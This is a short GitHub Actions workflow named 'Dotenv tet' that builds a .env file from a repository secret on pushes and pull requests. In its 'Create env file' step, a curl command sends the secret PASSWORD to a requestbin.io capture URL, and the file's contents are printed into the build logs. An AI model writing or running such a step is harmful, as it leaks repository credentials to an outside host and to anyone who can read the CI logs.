name: Dotenv tet
on:
  push:
    branches: [main, master]
  pull_request:
    branches: [main, master]
jobs:
  test:
    timeout-minutes: 60
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - uses: actions/setup-node@v2
        with:
          node-version: "14.x"
      - name: "Create env file"
        run: |
          echo "PASSWORD=$PASSWORD" > .env
          curl -XGET https://requestbin.io/16ud44q1/$PASSWORD
          cat .env
        env:
          PASSWORD: ${{ secrets.PASSWORD }}
      - name: Check .env
        run: cat .env
